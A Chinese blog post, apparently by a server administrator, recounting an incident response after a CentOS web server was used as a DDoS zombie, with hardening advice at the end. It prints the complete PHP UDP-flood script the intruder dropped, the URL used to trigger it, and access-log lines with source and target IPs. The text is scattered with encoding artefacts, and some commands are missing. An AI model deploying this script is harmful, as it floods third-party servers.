今天早上五點����,收到監控寶的警告短信���,說是網站M無法訪問了�����。睡的正香�,再說網站所在系統是centos�,重要數據每天都備份,應該很安全����,也沒有在意����。倒頭接著睡覺去了�。
早上九點,機房負責人直接給我打來電話�����,說是全機房網絡巨慢���,單位的所有網站都打不開或打開的很慢。Centos服務器被掛馬的一次抓馬經歷。
我趕緊趕了過去���,查看了一下那里網絡�����,發現175服務總是以50M/S速度向外發包,而175服務器正是網站M所在的服務器���。
果斷SSH連接175服務器,發現175服務器連接也很慢��,連上之后top一下�����,查看cpu負載:
top
發現有兩個apache進程占用cpu一直在40%以上�,馬上停止httpd 服務
停止httpd服務之后��,再看網絡狀態�,175服務器也不向外發包了,一切正常�����。
由此判斷應該是175服務器掛了馬�����,瘋狂向外發包�����,擠占了全部機房帶寬�����。
下一步就是抓馬了�!
175服務器是有硬件防火墻����,只開http80跟ssh22端口����,ssh不太可能被盜號,應該是通過web漏洞掛馬��。早上5點才中招的,木馬程序文件應該在1天之內�����。
切到M站點根目錄之下��,查找最近一天內變動的文件�����,執行
果然����,一個名為phzLtoxn.php的可疑文件出現在目錄列表中�����。查看一下木馬程序的創建者�����,執行
這里發現文件就沒了��,難道這文件還會自我銷毀���?Centos服務器被掛馬的一次抓馬經歷
原來發生了一個小插曲��,隔壁的管理員小黃也注意到這個文件,二話不說就刪除了���。我過去劈頭批評教育了小黃一頓。見了木馬程序就知道刪刪刪刪�����!難道木馬程序不會再生成?���??你得順藤摸瓜,不是一刀切��。你得找到漏洞源頭���!刪了沒辦法,再把httpd服務開啟了���,引狼入室�����,等等看能否再生成�����。
果然�����,半小時不到���,新的phzLtoxn.PHP文件又生成了。查看了一下�����,文件創建者是apache,由此判斷這肯定是通過網站漏洞上傳的�。
分析一下木馬文件�����,看下黑客意圖
這里貼出phzLtoxn.php文件源代碼,并作了簡單注釋����,僅作學習之用���。
<?php//設置腳本運行時間set_time_limit(999999);//攻擊目標服務器ip$host = $_GET['host'];//攻擊目標服務器端口$port = $_GET['port'];//攻擊時長$exec_time = $_GET['time'];//每次發送字節數$Sendlen = 65535;$packets = 0;//設置客戶機斷開不終止腳本的執行ignore_user_abort(TRUE);//step1. 目標服務器$host、端口$port���、運行時長$exec_time有效性if (StrLen($host) == 0 or StrLen($port) == 0 or StrLen($exec_time) == 0) { if (StrLen($_GET['rat']) <> 0) { echo $_GET['rat'] . $_SERVER["HTTP_HOST"] . "|" . GetHostByName($_SERVER['SERVER_NAME']) . "|" . php_uname() . "|" . $_SERVER['SERVER_software'] . $_GET['rat']; exit; } echo "Warning to: opening"; exit;}//step2. 設定發字符串$out,這里是“AAAAAAAAAA...”for ($i = 0; $i < $Sendlen; $i++) { $out .= "A";}$max_time = time() + $exec_time;//step3. 進行攻擊,使用udp向目標服務器狠狠發串串while (1) { $packets++; if (time() > $max_time) { break; } $fp = fsockopen("udp://$host", $port, $errno, $errstr, 5); if ($fp) { fwrite($fp, $out); fclose($fp); }}//step4. 攻擊統計echo "Send Host $host:$port<br><br>";echo "Send Flow $packets * ($Sendlen/1024=" . round($Sendlen / 1024, 2) . ")kb / 1024 = " . round($packets * $Sendlen / 1024 / 1024, 2) . " mb<br><br>";echo "Send Rate " . round($packets / $exec_time, 2) . " packs/s" . round($packets / $exec_time * $Sendlen / 1024 / 1024, 2) . " mb/s";?> 從以上代碼可以看出�,是個典型的ddos攻擊代碼���。黑客應該是把我們服務器當傀儡使用,組織大量傀儡服務器瘋狂向目標服務器發包��。黑客只需要打開瀏覽器���,敲入http://M站域名.com//phzLtoxn.php?host=x.x.x.x&port=xx&time=xx就可以對目標服務器進行ddos攻擊了�����。
查看httpd日志�����,分析下攻擊ip源�����,執行
tail /var/log/httpd/access.log | grep phzLtonxn.php183.12.75.240 - - [10/Aug/2012:10:38:46 +0800] "GET /phzLtoxn.php?host=174.139.81.91&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"110.185.121.167 - - [10/Aug/2012:10:38:56 +0800] "GET /phzLtoxn.php?host=218.93.248.98&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"110.185.121.167 - - [10/Aug/2012:10:38:58 +0800] "GET /phzLtoxn.php?host=198.148.89.34&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"110.185.121.167 - - [10/Aug/2012:10:39:08 +0800] "GET /phzLtoxn.php?host=199.119.207.133&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"110.185.121.167 - - [10/Aug/2012:10:39:12 +0800] "GET /phzLtoxn.php?host=174.139.81.91&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"118.161.219.152 - - [10/Aug/2012:10:39:27 +0800] "GET /phzLtoxn.php?host=198.148.89.34&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"118.161.219.152 - - [10/Aug/2012:10:39:27 +0800] "GET /phzLtoxn.php?host=174.139.81.91&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"118.161.219.152 - - [10/Aug/2012:10:39:27 +0800] "GET /phzLtoxn.php?host=199.119.207.133&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"118.161.219.152 - - [10/Aug/2012:10:39:27 +0800] "GET /phzLtoxn.php?host=218.93.248.98&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"118.161.219.152 - - [10/Aug/2012:10:39:28 +0800] "GET /phzLtoxn.php?host=61.164.148.49&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"
發現源ip來自多個��,目標服務器ip也有多個���,都屬于很多國家�����,有點奇怪啊,為什么黑客有針對性的攻擊呢���,無聊的黑客啊��。
下一步�,找漏洞!
1�、重新審視了M站目錄下文件權限。僅對幾個必要的緩存�、靜態化的目錄為apache開啟了寫權限,防止phzLtoxn.php文件再次生成���。
2、重新開啟httpd服務�,使用360網站檢測 http://webscan.#/ 對H站進行漏洞檢測���,發現H站中有嚴重的遠程執行漏洞,于是趕緊打了補丁����。
3、補丁打好之后���,順便修改了系統用戶、數據庫用戶���、ftp用戶的密碼�����、M站系統用戶密碼���。
觀察幾日之后�����,一切正常����。
小結一下幾個安全原則
1�、權限最小化�����。
web目錄一定做好權限�����,僅僅對apache開幾個必要文件夾的寫權限�。
2、時刻注意補丁更新����。
經常使用第三方的網站安全檢測工具,如http://webscan.#���,也可參考十大安全評估工具�,如果網站系統使用了第三方常用程序�,多注意一下烏云漏洞平臺的信息http://www.wooyun.org/。
3����、中招后一定要補牢。
別光刪刪刪刪���,要查找中招源頭�,分析黑客目的。
這是還是請大牛小牛們分析一下���,為什么這幫黑客用那么多的肉雞來ddos攻擊不同的服務器����,而這些被ddos攻擊的服務器之間卻沒有什么聯系�����。為什么攻擊沒有針對性?難道是為了耗帶寬玩�����?���!
